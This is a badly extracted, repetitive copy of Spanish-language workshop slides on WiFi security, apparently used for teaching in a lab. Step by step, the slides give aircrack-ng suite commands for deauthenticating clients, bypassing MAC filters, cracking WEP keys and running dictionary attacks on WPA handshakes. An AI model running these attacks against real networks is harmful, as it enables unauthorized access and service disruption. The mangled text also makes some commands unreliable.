7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 12: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 13: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

